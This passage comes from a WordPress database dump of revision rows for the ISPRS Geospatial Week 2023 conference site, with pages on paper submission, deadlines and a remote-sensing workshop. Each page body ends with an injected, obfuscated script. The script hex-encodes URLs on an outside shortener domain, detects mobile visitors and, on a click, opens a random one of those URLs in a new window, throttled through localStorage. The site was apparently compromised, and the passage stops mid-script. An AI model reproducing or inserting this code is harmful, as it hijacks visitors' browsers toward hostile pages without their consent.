)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 10:12:00','2023-02-02 10:12:00','',3709,'https://gsw2023.com/?p=3718',0,'revision','',0),
(3719,1,'2023-02-02 10:24:30','2023-02-02 10:24:30','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\">\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li>\n<h6><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: June 1, 2023</strong></h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li>\n<h6>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n</li>\n<li>\n<h6>Abstracts Author notification: May 15, 2023</h6>\n</li>\n<li>\n<h6>Camera ready paper submission: June 1, 2023</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\">\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-02 10:24:30','2023-02-02 10:24:30','',2659,'https://gsw2023.com/?p=3719',0,'revision','',0),
(3720,1,'2023-02-02 10:25:05','2023-02-02 10:25:05','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<h5></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li>\n<h6><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: June 1, 2023</strong></h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li>\n<h6>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n</li>\n<li>\n<h6>Abstracts Author notification: May 15, 2023</h6>\n</li>\n<li>\n<h6>Camera ready paper submission: June 1, 2023</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\">\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 